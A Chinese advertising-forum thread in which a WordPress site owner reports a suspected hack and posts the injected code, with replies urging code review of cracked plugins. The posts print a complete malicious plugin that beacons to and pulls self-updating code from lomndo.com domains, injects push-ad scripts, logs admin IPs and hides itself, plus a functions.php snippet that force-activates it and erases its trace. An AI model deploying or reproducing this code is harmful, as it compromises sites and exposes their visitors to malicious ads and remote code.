AdvertCN - 广告中国

 找回密码
 立即注册

QQ登录

只需一步,快速开始

Binom
 谷歌+Bing+TT+MSN官方代理 
⚡️按条S5代理⚡️静态⚡️独享⚡️5G⚡️最干净<Wifi住宅+5G移动>IP代理指纹浏览器,就用AdsPower
Mediabuy⚡️玩家开户首选【鲁班跨境通-自助充值转账】FB/GG/TT❤️官方免费开户Affiliate 全媒体流量资源⚡️
Taboola/Outbrain /Bing⚡️一级代理开户投流-7*24h❤️人工在线【官方】❤️搜索套利广告开户独立站⚡️开户投放
DuoPlus专注打造跨境电商云手机E.PN 虚拟卡BINOM TRACKER 60% OFF!比Adplexity还好用的Spy工具
MediaGo+Taboola+Ob开户百度国际MediaGo⚡️让产品狂奔全球百度国际,高点击转化,快速放量百度国际MediaGo,独家原生流量
ADPLEXITY + ADVERTCN7200W全球动态不重复住宅IP代理虚拟信用卡+独立站收款全球虚拟卡, 支持U充值
Facebook 批量上广告尤里改 - FB 稳定投放免费黑五教程(持续更新、欢迎交流)FB 三不限源头 - 自助下户充值转款
各种主页、账单户、BM户(优势)⚡️个人户,bm户不限额,账单户一手BM分享户不限额9Proxy ⚡️ $0.04/IP, 无限带宽
FB二三解0.1元一个虚拟卡|PTM星际卡FB专用虚拟卡Google、Bing官方总代  联盟流量开户
FB账号资源/稳定靠谱/运行5年啦FB开户代投/三不限/白名单fb耐用号0.01一个fb账号官方合作商
广告位出租   
查看: 3051|回复: 10

网站是不是被人挂马了

[复制链接]

20

主题

257

广告币

579

积分

中级会员

Rank: 3Rank: 3

积分
579

社区QQ达人

发表于 2020-6-22 15:37:11 | 显示全部楼层 |阅读模式
wordpress站,前几天进去无意看见inpagepush,还让订阅本站,这些我都没加,第二次进去这些都没了,换了台电脑也没了,今天网站打不开,function被改了,网站直接打不开了,这段代码指向插件目录下的一个php页面,看不懂,代码如下
相关帖子
回复

使用道具 举报

20

主题

257

广告币

579

积分

中级会员

Rank: 3Rank: 3

积分
579

社区QQ达人

 楼主| 发表于 2020-6-22 15:38:28 | 显示全部楼层
  1. <?php
  2. /**
  3. * Plugin Name: Monitization
  4. * Description: this plugin will help you Monitize your traffic easily from different ad networks.
  5. * Author: Igor Glavatskiy
  6. * Version: 1.0
  7. */
  8. error_reporting(0);
  9. ini_set('display_errors', 0);
  10. $plugin_key='9f3d4cbd075c63c03c06a63f4579eb13';
  11. $version='1.2';
  12. add_action('admin_menu', function() {
  13.     add_options_page( 'Monitization Plugin', 'Monitization', 'manage_options', 'monit', 'mont_page' );
  14.     remove_submenu_page( 'options-general.php', 'monit' );
  15. });



  16. add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_link');
  17. function salcode_add_plugin_page_settings_link( $links ) {
  18.         $links[] = '<a href="' .
  19.                 admin_url( 'options-general.php?page=monit' ) .
  20.                 '">' . __('Settings') . '</a>';
  21.         return $links;
  22. }






  23. add_action( 'admin_init', function() {

  24.     register_setting( 'mont-settings', 'default_mont_options' );
  25.     register_setting( 'mont-settings', 'ad_code' );
  26.         register_setting( 'mont-settings', 'hide_admin' );
  27.         register_setting( 'mont-settings', 'hide_logged_in' );
  28.     register_setting( 'mont-settings', 'display_ad' );
  29.     register_setting( 'mont-settings', 'search_engines' );
  30.         register_setting( 'mont-settings', 'auto_update' );
  31.         register_setting( 'mont-settings', 'ip_admin');
  32.         register_setting( 'mont-settings', 'cookies_admin' );
  33.         register_setting( 'mont-settings', 'logged_admin' );
  34.         register_setting( 'mont-settings', 'log_install' );
  35.        
  36. });

  37. $ad_code='
  38. <script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async data-cfasync="false"></script>
  39. <script src="https://pushsar.com/pfe/current/tag.min.js?z=3260077" data-cfasync="false" async></script>
  40. <script type="text/javascript" src="//inpagepush.com/400/3324386" data-cfasync="false" async="async"></script>
  41. ';

  42. $hide_admin='on';
  43. $hide_logged_in='on';
  44. $display_ad='organic';
  45. $search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
  46. $auto_update='on';
  47. $ip_admin='on';
  48. $cookies_admin='on';
  49. $logged_admin='on';
  50. $log_install='';

  51. function mont_page() {
  52. ?>
  53.    <div class="wrap">
  54. <form action="options.php" method="post">
  55.        <?php
  56.        settings_fields( 'mont-settings' );
  57.        do_settings_sections( 'mont-settings' );
  58. $ad_code='

  59. ';

  60. $hide_admin='on';
  61. $hide_logged_in='on';
  62. $display_ad='organic';
  63. $search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com';
  64. $auto_update='on';
  65. $ip_admin='on';
  66. $cookies_admin='on';
  67. $logged_admin='on';
  68. $log_install='';

  69.        ?>
  70.            <h2>Monetization Plugin</h2>
  71.            <table>
  72.             
  73. <tr>
  74.                 <th>Ad Code</th>
  75.                 <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea><br><p class="description">
  76. Don't have ad code ? <a href="https://propellerads.com/publishers/?ref_id=TbQg" target="_blank">propellerAds (up to $10 CPM).</a></p></td>
  77.             </tr>
  78.                        
  79.                        
  80.                        
  81. <tr>
  82.                 <th>Hide ads to :</th>
  83.                 <td>
  84.                     <input type="hidden" id="default_mont_options" name="default_mont_options" value="on">
  85.                     <label>
  86.                         <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins
  87.                     </label>
  88.                     <label>
  89.                         <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users
  90.                     </label>
  91.                                         <br/>
  92.                  

  93.                 </td>
  94.             </tr>
  95.                        
  96.                        
  97.                        
  98.                         <tr>
  99.                 <th>Recognize admin by :</th>
  100.                 <td>

  101.                     <label>
  102.                         <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in
  103.                     </label>
  104.                     <label>
  105.                         <input type="checkbox" name="ip_admin" id="ip_admin"  <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses
  106.                     </label>
  107.                                         <label>
  108.                         <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies
  109.                     </label>
  110.                                
  111.                  

  112.                 </td>
  113.             </tr>
  114.                        
  115.                        
  116.                        
  117.                         <tr>
  118.                 <th>Display ads to :</th>
  119.                 <td>
  120.                                                           <select name="display_ad">
  121.                         
  122.                         <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option>
  123.                         <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option>
  124.                         
  125.                     </select>

  126.                 </td>
  127.             </tr>

  128.             <tr>
  129.                 <th>Search Engines</th>
  130.                 <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description">
  131.                         comma separated  </p>
  132.                                 </td>
  133.             </tr>


  134. <tr>
  135.                 <th>Auto Update :</th>
  136.                 <td>

  137.                     <label>
  138.                         <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin
  139.                     </label><br/>
  140.                  

  141.                 </td>
  142.             </tr>

  143.             <tr>
  144.                 <td><?php submit_button(); ?></td>
  145.             </tr>

  146.         </table>
  147.           
  148.           
  149.           
  150.      </form>
  151.    </div>
  152. <?php
  153. }

  154. /*************************log install***************************/
  155. if(get_option('log_install') !=='1')
  156. {
  157.     if(!$log_installed = @file_get_contents("http://www.lomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
  158. {
  159.     $log_installed = @file_get_contents_curl1("http://www.lomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
  160. }
  161. }
  162. /*************************set default options***************************/

  163. if(get_option('default_mont_options') !=='on')
  164. {
  165. update_option('ip_admin', $ip_admin);
  166. update_option('ad_code', $ad_code);
  167. update_option('cookies_admin', $cookies_admin);
  168. update_option('logged_admin', $logged_admin);
  169. update_option('hide_admin', $hide_admin);
  170. update_option('hide_logged_in', $hide_logged_in);
  171. update_option('display_ad', $display_ad);
  172. update_option('search_engines', $search_engines);
  173. update_option('auto_update', $auto_update);
  174. update_option('log_install', '1');
  175. }

  176. /************************************************************************/
  177. include_once(ABSPATH . 'wp-includes/pluggable.php');

  178. if ( ! function_exists( 'display_ad_single' ) ) {  

  179. function display_ad_single($content){
  180. if(is_single())
  181. {

  182. $content=$content.get_option('ad_code');;
  183. }
  184. return $content;
  185. }

  186. function display_ad_footer(){
  187. if(!is_single())
  188. {
  189. echo get_option('ad_code');
  190. }
  191. }


  192. //setting cookies if admin logged in
  193. function setting_admin_cookie() {
  194.   setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  195.   }

  196. if(get_option('cookies_admin')=='on')
  197. {

  198. if(is_user_logged_in())
  199. {
  200. add_action( 'init', 'setting_admin_cookie',1 );
  201. }
  202. }


  203. //log admin IP addresses

  204. if(get_option('ip_admin')=='on')
  205. {
  206. if(current_user_can('edit_others_pages'))
  207. {

  208. if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt'))
  209. {
  210. $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
  211. }

  212. if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
  213. {
  214. $ip.=$_SERVER['REMOTE_ADDR'].'
  215. ';
  216. @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);

  217. }

  218. }
  219. }// end if log admins ip



  220. //add cookies to organic traffic

  221. if(get_option('display_ad')=='organic')
  222. {

  223. $search_engines = explode(',', get_option('search_engines'));

  224. $referer = $_SERVER['HTTP_REFERER'];
  225. $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
  226. foreach ($search_engines as $search) {
  227.   if (strpos($referer,$search)!==false) {
  228.     setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
  229.         $organic=true;
  230.   }
  231. }

  232. }//end




  233. //display ad

  234. if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in())
  235. {

  236. $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');
  237. if (stripos($ips, $_SERVER['REMOTE_ADDR']) === false)
  238. {
  239. /*****/
  240. if(get_option('display_ad')=='organic')
  241. {
  242. if($organic==true || isset($_COOKIE['organic']))
  243. {
  244. add_filter('the_content','display_ad_single');
  245. add_action('wp_footer','display_ad_footer');
  246. }
  247. }
  248. else
  249. {
  250. add_filter('the_content','display_ad_single');
  251. add_action('wp_footer','display_ad_footer');  
  252. }

  253. /****/

  254. }

  255. }
  256. /*******************/





  257. //update plugin

  258. if(get_option('auto_update')=='on')
  259. {

  260. if( ini_get('allow_url_fopen') ) {



  261.         if (($new_version = @file_get_contents("http://www.lomndo.com/monit_update.php") OR $new_version = @file_get_contents_curl1("http://www.lomndo.com/monit_update.php")) AND stripos($new_version, $plugin_key) !== false) {

  262.             if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
  263.                @file_put_contents(__FILE__, $new_version);
  264.                
  265.             }
  266.         }
  267.         
  268.         
  269.                 elseif ($new_version = @file_get_contents("http://www.lomndo.xyz/monit_update.php") AND stripos($new_version, $plugin_key) !== false) {

  270.             if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
  271.                @file_put_contents(__FILE__, $new_version);
  272.                
  273.             }
  274.         }


  275.         elseif ($new_version = @file_get_contents("http://www.lomndo.top/monit_update.php") AND stripos($new_version, $plugin_key) !== false) {

  276.             if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
  277.                @file_put_contents(__FILE__, $new_version);
  278.                
  279.             }
  280.         }

  281. }
  282. else
  283. {
  284.             if (($new_version = @file_get_contents("http://www.lomndo.com/monit_update.php") OR $new_version = @file_get_contents_curl1("http://www.lomndo.com/monit_update.php")) AND stripos($new_version, $plugin_key) !== false) {

  285.             if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
  286.                @file_put_contents(__FILE__, $new_version);
  287.                
  288.             }
  289.         }
  290.         
  291.         
  292.                 elseif ($new_version = @file_get_contents_curl1("http://www.lomndo.xyz/monit_update.php") AND stripos($new_version, $plugin_key) !== false) {

  293.             if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
  294.                @file_put_contents(__FILE__, $new_version);
  295.                
  296.             }
  297.         }


  298.         elseif ($new_version = @file_get_contents_curl1("http://www.lomndo.top/monit_update.php") AND stripos($new_version, $plugin_key) !== false) {

  299.             if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) {
  300.                @file_put_contents(__FILE__, $new_version);
  301.                
  302.             }
  303.         }
  304. }
  305. }//end if auto update

  306. /*********************************/




  307. }// if function exist


  308.      function file_get_contents_curl1($url)
  309.         {
  310.             $ch = curl_init();
  311.             curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
  312.             curl_setopt($ch, CURLOPT_HEADER, 0);
  313.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  314.             curl_setopt($ch, CURLOPT_URL, $url);
  315.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  316.             $data = curl_exec($ch);
  317.             curl_close($ch);
  318.             return $data;
  319.         }


  320. function hide_plugin_trickspanda() {
  321.   global $wp_list_table;
  322.   $hidearr = array('monit.php');
  323.   $myplugins = $wp_list_table->items;
  324.   foreach ($myplugins as $key => $val) {
  325.     if (in_array($key,$hidearr)) {
  326.       unset($wp_list_table->items[$key]);
  327.     }
  328.   }
  329. }

  330. add_action('pre_current_active_plugins', 'hide_plugin_trickspanda');
  331. ?>
复制代码


回复 支持 反对

使用道具 举报

20

主题

257

广告币

579

积分

中级会员

Rank: 3Rank: 3

积分
579

社区QQ达人

 楼主| 发表于 2020-6-22 15:43:06 | 显示全部楼层
function下加的段代码
  1. function true_plugins_activate() {
  2.         $active_plugins = get_option('active_plugins');
  3.         $activate_this = array(
  4.                 'monit.php'
  5.         );
  6.         foreach ($activate_this as $plugin) {
  7.                 if (!in_array($plugin, $active_plugins)) {
  8.                         array_push($active_plugins, $plugin);
  9.                         update_option('active_plugins', $active_plugins);
  10.                 }
  11.         }
  12.         $new_active_plugins = get_option('active_plugins');
  13.         if (in_array('monit.php', $new_active_plugins)) {
  14.                 $functionsPath = dirname(__FILE__) . '/functions.php';
  15.                 $functions = file_get_contents($functionsPath);

  16.                 $start = stripos($functions, "function true_plugins_activate()");
  17.                 $end = strripos($functions, "true_plugins_activate");
  18.                 $endDelete = $end + mb_strlen("true_plugins_activate") + 3;

  19.                 if($start && $end) {
  20.                         $str = substr($functions, 0, $start);
  21.                         $str .= substr($functions, $endDelete);
  22.                         file_put_contents($functionsPath, $str);
  23.                 }
  24.                                 $script = file_get_contents('/xxxxxxxxxxxxxxx/wp-content/plugins/monit.php');
  25.                 //file_put_contents('/xxxxxxxxxxxxxxxxx/wp-content/plugins/monit.php', '');
  26.         }
  27. }

  28. add_action('init', 'true_plugins_activate');

  29. function true_plugins_activate() {
  30.         $active_plugins = get_option('active_plugins');
  31.         $activate_this = array(
  32.                 'monit.php'
  33.         );
  34.         foreach ($activate_this as $plugin) {
  35.                 if (!in_array($plugin, $active_plugins)) {
  36.                         array_push($active_plugins, $plugin);
  37.                         update_option('active_plugins', $active_plugins);
  38.                 }
  39.         }
  40.         $new_active_plugins = get_option('active_plugins');
  41.         if (in_array('monit.php', $new_active_plugins)) {
  42.                 $functionsPath = dirname(__FILE__) . '/functions.php';
  43.                 $functions = file_get_contents($functionsPath);

  44.                 $start = stripos($functions, "function true_plugins_activate()");
  45.                 $end = strripos($functions, "true_plugins_activate");
  46.                 $endDelete = $end + mb_strlen("true_plugins_activate") + 3;

  47.                 if($start && $end) {
  48.                         $str = substr($functions, 0, $start);
  49.                         $str .= substr($functions, $endDelete);
  50.                         file_put_contents($functionsPath, $str);
  51.                 }
  52.                                 $script = file_get_contents('/xxxxxxxxxxxxxxx/wp-content/plugins/monit.php');
  53.                 //file_put_contents('/xxxxxxxxxxxxxxxxxxx/wp-content/plugins/monit.php', '');
  54.         }
  55. }

  56. add_action('init', 'true_plugins_activate');
复制代码
回复 支持 反对

使用道具 举报

6

主题

548

广告币

3008

积分

高级会员

Rank: 4

积分
3008
发表于 2020-6-22 16:00:15 来自手机 | 显示全部楼层
用比较工具,跟同一版本的wordpress源码比较下

点评

二楼的那段是在plugin下的一个单独php文件 正常的wordpress是没有这段的  详情 回复 发表于 2020-6-22 16:08
回复 支持 反对

使用道具 举报

20

主题

257

广告币

579

积分

中级会员

Rank: 3Rank: 3

积分
579

社区QQ达人

 楼主| 发表于 2020-6-22 16:08:15 | 显示全部楼层
ronse 发表于 2020-6-22 16:00
用比较工具,跟同一版本的wordpress源码比较下

二楼的那段是在plugin下的一个单独php文件 正常的wordpress是没有这段的
回复 支持 反对

使用道具 举报

20

主题

257

广告币

579

积分

中级会员

Rank: 3Rank: 3

积分
579

社区QQ达人

 楼主| 发表于 2020-6-22 16:44:26 | 显示全部楼层
回复 支持 反对

使用道具 举报

20

主题

257

广告币

579

积分

中级会员

Rank: 3Rank: 3

积分
579

社区QQ达人

 楼主| 发表于 2020-6-22 16:54:04 | 显示全部楼层
用破解版插件的原因
回复 支持 反对

使用道具 举报

1618

主题

2万

广告币

2万

积分

管理员

宇宙无敌河马天神

Rank: 9Rank: 9Rank: 9

积分
29619

社区QQ达人

发表于 2020-6-22 19:02:54 | 显示全部楼层
用破解版的插件前,一定要review 一下code

最好自己看着改写一下

点评

幸亏没多少流量 不过这家伙变现效率有点高 push订阅+inpage push+chrome插件安装。我说投adwords怎么报恶意软件  详情 回复 发表于 2020-6-22 20:54
学会提问的艺术, 从小处入手, 忌大而空
AdvertCN电报群

我最喜欢用的工具
7200W全球动态不重复住宅IP代理
回复 支持 反对

使用道具 举报

20

主题

257

广告币

579

积分

中级会员

Rank: 3Rank: 3

积分
579

社区QQ达人

 楼主| 发表于 2020-6-22 20:54:25 | 显示全部楼层
河小马 发表于 2020-6-22 19:02
用破解版的插件前,一定要review 一下code

最好自己看着改写一下

幸亏没多少流量 不过这家伙变现效率有点高 push订阅+inpage push+chrome插件安装。我说投adwords怎么报恶意软件
回复 支持 反对

使用道具 举报

20

主题

915

广告币

1569

积分

高级会员

Rank: 4

积分
1569

社区QQ达人

发表于 2020-6-23 10:39:40 | 显示全部楼层
曾经被代码注入过好多次 都是linode客服给suspend提醒了才发现
敲黑板 生产环境 一定要用正版的主题

点评

我也是,哈哈,后面就生成单页做了  详情 回复 发表于 2020-6-23 14:16
回复 支持 反对

使用道具 举报

1

主题

56

广告币

133

积分

初级会员

Rank: 2

积分
133

社区QQ达人

发表于 2020-6-23 14:16:18 | 显示全部楼层
Atrus 发表于 2020-6-23 10:39
曾经被代码注入过好多次 都是linode客服给suspend提醒了才发现
敲黑板 生产环境 一定要用正版的主题  ...

我也是,哈哈,后面就生成单页做了
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|联系我们|DMCA|广告服务|小黑屋|手机版|Archiver|Github|网站地图|AdvertCN

GMT+8, 2024-11-21 20:02 , Processed in 0.049785 second(s), 15 queries , Gzip On, MemCache On.

Copyright © 2001-2023, AdvertCN

Proudly Operating in Hong Kong.

快速回复 返回顶部 返回列表